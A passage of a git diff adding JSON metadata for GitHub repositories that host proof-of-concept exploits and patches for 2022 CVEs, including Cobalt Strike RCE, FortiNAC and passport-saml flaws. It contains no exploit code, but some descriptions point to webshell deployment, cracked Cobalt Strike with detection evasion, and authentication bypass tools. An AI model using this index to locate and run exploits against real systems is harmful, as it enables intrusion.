1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 540026592, + "name": "cve-2022-39197", + "full_name": "burpheart\/cve-2022-39197", + "owner": { + "login": "burpheart", + "id": 35721255, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35721255?v=4", + "html_url": "https:\/\/github.com\/burpheart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/burpheart\/cve-2022-39197", + "description": "cve-2022-39197 poc", + "fork": false, + "created_at": "2022-09-22T14:39:02Z", + "updated_at": "2024-10-04T11:42:53Z", + "pushed_at": "2022-09-22T15:03:24Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 73, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 540344470, + "name": "CVE-2022-39197-POC", + "full_name": "xzajyjs\/CVE-2022-39197-POC", + "owner": { + "login": "xzajyjs", + "id": 25580455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25580455?v=4", + "html_url": "https:\/\/github.com\/xzajyjs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xzajyjs\/CVE-2022-39197-POC", + "description": "CVE-2022-39197(CobaltStrike XSS <=4.7) POC", + "fork": false, + "created_at": "2022-09-23T08:20:07Z", + "updated_at": "2024-09-07T04:14:55Z", + "pushed_at": "2022-09-30T06:31:11Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540757312, + "name": "CSPOC", + "full_name": "yqcs\/CSPOC", + "owner": { + "login": "yqcs", + "id": 32994290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32994290?v=4", + "html_url": "https:\/\/github.com\/yqcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yqcs\/CSPOC", + "description": "Cobalt Strike RCE CVE-2022-39197 ", + "fork": false, + "created_at": "2022-09-24T08:14:36Z", + "updated_at": "2023-10-13T06:40:41Z", + "pushed_at": "2022-09-25T08:59:09Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobalt-strike", + "cve-2022-39197", + "rce" + ], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540859131, + "name": "Cobaltstrike-RCE-CVE-2022-39197", + "full_name": "purple-WL\/Cobaltstrike-RCE-CVE-2022-39197", + "owner": { + "login": "purple-WL", + "id": 63894044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63894044?v=4", + "html_url": "https:\/\/github.com\/purple-WL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purple-WL\/Cobaltstrike-RCE-CVE-2022-39197", + "description": null, + "fork": false, + "created_at": "2022-09-24T14:36:47Z", + "updated_at": "2022-09-25T21:25:42Z", + "pushed_at": "2022-09-24T14:42:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 541427621, + "name": "about_cobaltstrike4.5_cdf", + "full_name": "lovechoudoufu\/about_cobaltstrike4.5_cdf", + "owner": { + "login": "lovechoudoufu", + "id": 95681496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95681496?v=4", + "html_url": "https:\/\/github.com\/lovechoudoufu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lovechoudoufu\/about_cobaltstrike4.5_cdf", + "description": "cobaltstrike4.5版本破解、去除checksum8特征、bypass BeaconEye、修复错误路径泄漏stage、增加totp双因子验证、修复CVE-2022-39197等", + "fork": false, + "created_at": "2022-09-26T05:49:58Z", + "updated_at": "2024-07-11T07:23:02Z", + "pushed_at": "2022-09-26T06:17:25Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 541494150, + "name": "CVE-2022-39197-patch", + "full_name": "burpheart\/CVE-2022-39197-patch", + "owner": { + "login": "burpheart", + "id": 35721255, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35721255?v=4", + "html_url": "https:\/\/github.com\/burpheart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/burpheart\/CVE-2022-39197-patch", + "description": "CVE-2022-39197 漏洞补丁. CVE-2022-39197 Vulnerability Patch. ", + "fork": false, + "created_at": "2022-09-26T08:58:21Z", + "updated_at": "2024-11-24T15:25:04Z", + "pushed_at": "2022-09-26T13:20:38Z", + "stargazers_count": 315, + "watchers_count": 315, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobalt-strike", + "cobaltstrike", + "cve-2022-39197" + ], + "visibility": "public", + "forks": 46, + "watchers": 315, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 542025379, + "name": "cobaltstrike_swing_xss2rce", + "full_name": "hluwa\/cobaltstrike_swing_xss2rce", + "owner": { + "login": "hluwa", + "id": 18900732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18900732?v=4", + "html_url": "https:\/\/github.com\/hluwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hluwa\/cobaltstrike_swing_xss2rce", + "description": "CVE-2022-39197", + "fork": false, + "created_at": "2022-09-27T10:21:54Z", + "updated_at": "2023-04-11T03:40:01Z", + "pushed_at": "2022-09-27T10:56:03Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548184563, + "name": "CVE-2022-39197-fix_patch", + "full_name": "4nth0ny1130\/CVE-2022-39197-fix_patch", + "owner": { + "login": "4nth0ny1130", + "id": 73661290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73661290?v=4", + "html_url": "https:\/\/github.com\/4nth0ny1130", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4nth0ny1130\/CVE-2022-39197-fix_patch", + "description": "CVE-2022-39197 bug fix patch", + "fork": false, + "created_at": "2022-10-09T04:06:23Z", + "updated_at": "2023-08-13T03:16:26Z", + "pushed_at": "2022-10-09T05:50:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551432473, + "name": "CVE-2022-39197", + "full_name": "its-arun\/CVE-2022-39197", + "owner": { + "login": "its-arun", + "id": 20841421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20841421?v=4", + "html_url": "https:\/\/github.com\/its-arun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/its-arun\/CVE-2022-39197", + "description": "CobaltStrike <= 4.7.1 RCE", + "fork": false, + "created_at": "2022-10-14T11:46:01Z", + "updated_at": "2024-12-09T09:21:36Z", + "pushed_at": "2022-10-25T05:32:54Z", + "stargazers_count": 377, + "watchers_count": 377, + "has_discussions": false, + "forks_count": 77, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 77, + "watchers": 377, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 555782036, + "name": "CVE-2022-39197-RCE", + "full_name": "TheCryingGame\/CVE-2022-39197-RCE", + "owner": { + "login": "TheCryingGame", + "id": 48227194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48227194?v=4", + "html_url": "https:\/\/github.com\/TheCryingGame", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCryingGame\/CVE-2022-39197-RCE", + "description": "CVE-2022-39197 RCE POC", + "fork": false, + "created_at": "2022-10-22T10:11:37Z", + "updated_at": "2024-05-20T14:01:29Z", + "pushed_at": "2022-10-22T11:13:59Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 570245587, + "name": "CVE-2022-39197", + "full_name": "adeljck\/CVE-2022-39197", + "owner": { + "login": "adeljck", + "id": 24542600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24542600?v=4", + "html_url": "https:\/\/github.com\/adeljck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adeljck\/CVE-2022-39197", + "description": "CVE-2022-39197", + "fork": false, + "created_at": "2022-11-24T17:22:10Z", + "updated_at": "2023-01-07T10:30:24Z", + "pushed_at": "2022-11-24T17:26:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 633726927, + "name": "pig_CS4.4", + "full_name": "xiao-zhu-zhu\/pig_CS4.4", + "owner": { + "login": "xiao-zhu-zhu", + "id": 85468097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85468097?v=4", + "html_url": "https:\/\/github.com\/xiao-zhu-zhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiao-zhu-zhu\/pig_CS4.4", + "description": "Cobalt Strike 4.4 猪猪版 去暗桩 去流量特征 beacon仿造真实API服务 修补CVE-2022-39197补丁", + "fork": false, + "created_at": "2023-04-28T06:31:38Z", + "updated_at": "2024-09-17T03:14:47Z", + "pushed_at": "2023-04-28T07:10:00Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 726816567, + "name": "Gui-poc-test", + "full_name": "Romanc9\/Gui-poc-test", + "owner": { + "login": "Romanc9", + "id": 55196564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55196564?v=4", + "html_url": "https:\/\/github.com\/Romanc9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Romanc9\/Gui-poc-test", + "description": "A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432", + "fork": false, + "created_at": "2023-12-03T13:45:34Z", + "updated_at": "2024-09-01T03:50:31Z", + "pushed_at": "2023-12-05T17:58:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-39197", + "cve-2023-21839", + "cve-2023-28432" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39227.json b/2022/CVE-2022-39227.json new file mode 100644 index 0000000000..378d093214 --- /dev/null +++ b/2022/CVE-2022-39227.json @@ -0,0 +1,73 @@ +[ + { + "id": 650577290, + "name": "CVE-2022-39227", + "full_name": "user0x1337\/CVE-2022-39227", + "owner": { + "login": "user0x1337", + "id": 108862394, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108862394?v=4", + "html_url": "https:\/\/github.com\/user0x1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/user0x1337\/CVE-2022-39227", + "description": "CVE-2022-39227 : Proof of Concept ", + "fork": false, + "created_at": "2023-06-07T11:11:12Z", + "updated_at": "2024-12-21T11:10:19Z", + "pushed_at": "2024-03-19T14:37:31Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "cve", + "cve-2022-39227", + "exploit", + "hackthebox", + "it-security", + "jwt", + "jwt-token" + ], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778808151, + "name": "CVE-2022-39227", + "full_name": "NoSpaceAvailable\/CVE-2022-39227", + "owner": { + "login": "NoSpaceAvailable", + "id": 143888307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143888307?v=4", + "html_url": "https:\/\/github.com\/NoSpaceAvailable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NoSpaceAvailable\/CVE-2022-39227", + "description": "A working POC found while doing a HTB challenge. Original: https:\/\/github.com\/user0x1337\/CVE-2022-39227", + "fork": false, + "created_at": "2024-03-28T12:55:13Z", + "updated_at": "2024-03-28T12:58:10Z", + "pushed_at": "2024-03-28T12:59:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39253.json b/2022/CVE-2022-39253.json new file mode 100644 index 0000000000..0f282357ad --- /dev/null +++ b/2022/CVE-2022-39253.json @@ -0,0 +1,64 @@ +[ + { + "id": 580301790, + "name": "docker-cve-2022-39253-poc", + "full_name": "ssst0n3\/docker-cve-2022-39253-poc", + "owner": { + "login": "ssst0n3", + "id": 16935049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16935049?v=4", + "html_url": "https:\/\/github.com\/ssst0n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssst0n3\/docker-cve-2022-39253-poc", + "description": null, + "fork": false, + "created_at": "2022-12-20T08:17:05Z", + "updated_at": "2024-01-17T16:04:23Z", + "pushed_at": "2023-02-02T06:08:05Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640961335, + "name": "NetworkSecurityFinalProject", + "full_name": "HiImDarwin\/NetworkSecurityFinalProject", + "owner": { + "login": "HiImDarwin", + "id": 53218645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53218645?v=4", + "html_url": "https:\/\/github.com\/HiImDarwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HiImDarwin\/NetworkSecurityFinalProject", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-39253", + "fork": false, + "created_at": "2023-05-15T13:40:17Z", + "updated_at": "2023-05-15T13:40:17Z", + "pushed_at": "2023-05-15T15:36:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39275.json b/2022/CVE-2022-39275.json new file mode 100644 index 0000000000..993699f2e0 --- /dev/null +++ b/2022/CVE-2022-39275.json @@ -0,0 +1,33 @@ +[ + { + "id": 889242972, + "name": "CVE-2022-39275", + "full_name": "omar2535\/CVE-2022-39275", + "owner": { + "login": "omar2535", + "id": 9442294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9442294?v=4", + "html_url": "https:\/\/github.com\/omar2535", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omar2535\/CVE-2022-39275", + "description": "CVE-2022-39275 Setup and POC", + "fork": false, + "created_at": "2024-11-15T22:21:16Z", + "updated_at": "2024-11-15T22:24:28Z", + "pushed_at": "2024-12-23T23:40:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39299.json b/2022/CVE-2022-39299.json new file mode 100644 index 0000000000..eda73c6f36 --- /dev/null +++ b/2022/CVE-2022-39299.json @@ -0,0 +1,33 @@ +[ + { + "id": 559966352, + "name": "CVE-2022-39299_PoC_Generator", + "full_name": "doyensec\/CVE-2022-39299_PoC_Generator", + "owner": { + "login": "doyensec", + "id": 25747968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25747968?v=4", + "html_url": "https:\/\/github.com\/doyensec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doyensec\/CVE-2022-39299_PoC_Generator", + "description": "A Simple CVE-2022-39299 PoC exploit generator to bypass authentication in SAML SSO Integrations using vulnerable versions of passport-saml", + "fork": false, + "created_at": "2022-10-31T13:24:34Z", + "updated_at": "2023-11-13T14:48:00Z", + "pushed_at": "2023-02-08T17:24:05Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3942.json b/2022/CVE-2022-3942.json new file mode 100644 index 0000000000..d1fc4f995c --- /dev/null +++ b/2022/CVE-2022-3942.json @@ -0,0 +1,33 @@ +[ + { + "id": 564714698, + "name": "CVE-2022-3942", + "full_name": "maikroservice\/CVE-2022-3942", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-3942", + "description": null, + "fork": false, + "created_at": "2022-11-11T10:24:01Z", + "updated_at": "2022-11-11T10:24:01Z", + "pushed_at": "2022-11-20T19:30:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39425.json b/2022/CVE-2022-39425.json new file mode 100644 index 0000000000..78b46b6404 --- /dev/null +++ b/2022/CVE-2022-39425.json @@ -0,0 +1,33 @@ +[ + { + "id": 569739742, + "name": "CVE-2022-39425", + "full_name": "bob11vrdp\/CVE-2022-39425", + "owner": { + "login": "bob11vrdp", + "id": 114571680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114571680?v=4", + "html_url": "https:\/\/github.com\/bob11vrdp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bob11vrdp\/CVE-2022-39425", + "description": "CVE-2022-39425 PoC", + "fork": false, + "created_at": "2022-11-23T14:03:43Z", + "updated_at": "2023-11-03T07:37:51Z", + "pushed_at": "2022-12-08T08:04:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3949.json b/2022/CVE-2022-3949.json new file mode 100644 index 0000000000..55d63129c3 --- /dev/null +++ b/2022/CVE-2022-3949.json @@ -0,0 +1,33 @@ +[ + { + "id": 564753737, + "name": "CVE-2022-3949", + "full_name": "maikroservice\/CVE-2022-3949", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-3949", + "description": "XSS in Simple Cashiering System", + "fork": false, + "created_at": "2022-11-11T12:21:51Z", + "updated_at": "2022-11-13T15:54:13Z", + "pushed_at": "2022-11-11T12:31:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39802.json b/2022/CVE-2022-39802.json new file mode 100644 index 0000000000..cdd26e84b5 --- /dev/null +++ b/2022/CVE-2022-39802.json @@ -0,0 +1,72 @@ +[ + { + "id": 552505373, + "name": "CVE-2022-39802", + "full_name": "vah13\/CVE-2022-39802", + "owner": { + "login": "vah13", + "id": 7976421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7976421?v=4", + "html_url": "https:\/\/github.com\/vah13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vah13\/CVE-2022-39802", + "description": "[CVE-2022-39802] File path traversal vulnerability in SAP Manufacturing Execution", + "fork": false, + "created_at": "2022-10-16T18:40:27Z", + "updated_at": "2022-10-16T18:40:27Z", + "pushed_at": "2022-10-16T18:40:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552505537, + "name": "CVE-2022-39802", + "full_name": "redrays-io\/CVE-2022-39802", + "owner": { + "login": "redrays-io", + "id": 89958617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89958617?v=4", + "html_url": "https:\/\/github.com\/redrays-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redrays-io\/CVE-2022-39802", + "description": "[CVE-2022-39802] File path traversal vulnerability in SAP Manufacturing Execution", + "fork": false, + "created_at": "2022-10-16T18:40:56Z", + "updated_at": "2023-01-04T21:21:15Z", + "pushed_at": "2022-10-16T18:48:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve", + "exploit", + "sap", + "security", + "vulnerability", + "zero-day" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39838.json b/2022/CVE-2022-39838.json new file mode 100644 index 0000000000..1aa4268da6 --- /dev/null +++ b/2022/CVE-2022-39838.json @@ -0,0 +1,33 @@ +[ + { + "id": 532933208, + "name": "CVE-2022-39838", + "full_name": "jet-pentest\/CVE-2022-39838", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2022-39838", + "description": null, + "fork": false, + "created_at": "2022-09-05T14:21:12Z", + "updated_at": "2022-09-06T19:01:16Z", + "pushed_at": "2022-09-05T14:29:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39841.json b/2022/CVE-2022-39841.json new file mode 100644 index 0000000000..0c250331a0 --- /dev/null +++ b/2022/CVE-2022-39841.json @@ -0,0 +1,33 @@ +[ + { + "id": 532900425, + "name": "CVE-2022-39841", + "full_name": "stealthcopter\/CVE-2022-39841", + "owner": { + "login": "stealthcopter", + "id": 1211162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1211162?v=4", + "html_url": "https:\/\/github.com\/stealthcopter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stealthcopter\/CVE-2022-39841", + "description": null, + "fork": false, + "created_at": "2022-09-05T12:54:26Z", + "updated_at": "2022-09-15T14:51:04Z", + "pushed_at": "2022-09-15T14:50:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3992.json b/2022/CVE-2022-3992.json new file mode 100644 index 0000000000..a21e2aae5c --- /dev/null +++ b/2022/CVE-2022-3992.json @@ -0,0 +1,33 @@ +[ + { + "id": 568063140, + "name": "CVE-2022-3992", + "full_name": "Urban4\/CVE-2022-3992", + "owner": { + "login": "Urban4", + "id": 81638590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81638590?v=4", + "html_url": "https:\/\/github.com\/Urban4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Urban4\/CVE-2022-3992", + "description": "Cross Site Scripting on sanitization-management-system", + "fork": false, + "created_at": "2022-11-19T10:36:37Z", + "updated_at": "2022-11-19T10:36:37Z", + "pushed_at": "2022-11-19T11:42:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39952.json b/2022/CVE-2022-39952.json new file mode 100644 index 0000000000..5dec349e61 --- /dev/null +++ b/2022/CVE-2022-39952.json @@ -0,0 +1,126 @@ +[ + { + "id": 604210945, + "name": "CVE-2022-39952", + "full_name": "horizon3ai\/CVE-2022-39952", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-39952", + "description": "POC for CVE-2022-39952", + "fork": false, + "created_at": "2023-02-20T15:12:33Z", + "updated_at": "2024-12-03T03:14:06Z", + "pushed_at": "2023-02-25T08:52:03Z", + "stargazers_count": 265, + "watchers_count": 265, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 265, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 604936934, + "name": "CVE-2022-39952_webshell", + "full_name": "shiyeshu\/CVE-2022-39952_webshell", + "owner": { + "login": "shiyeshu", + "id": 23716358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23716358?v=4", + "html_url": "https:\/\/github.com\/shiyeshu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiyeshu\/CVE-2022-39952_webshell", + "description": "Write Behinder_webshell to target using CVE-2022-39952", + "fork": false, + "created_at": "2023-02-22T04:57:06Z", + "updated_at": "2023-02-22T06:36:43Z", + "pushed_at": "2023-02-22T05:01:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 606840385, + "name": "CVE-2022-39952", + "full_name": "Chocapikk\/CVE-2022-39952", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-39952", + "description": "PoC for CVE-2022-39952 affecting Fortinet FortiNAC.", + "fork": false, + "created_at": "2023-02-26T18:10:04Z", + "updated_at": "2024-08-12T20:30:00Z", + "pushed_at": "2023-02-26T18:13:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 619925116, + "name": "CVE-2022-39952-better", + "full_name": "dkstar11q\/CVE-2022-39952-better", + "owner": { + "login": "dkstar11q", + "id": 123830677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4", + "html_url": "https:\/\/github.com\/dkstar11q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-39952-better", + "description": "PoC for CVE-2022-39952 affecting Fortinet FortiNAC.", + "fork": false, + "created_at": "2023-03-27T17:25:17Z", + "updated_at": "2023-02-26T18:26:27Z", + "pushed_at": "2023-02-26T18:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": 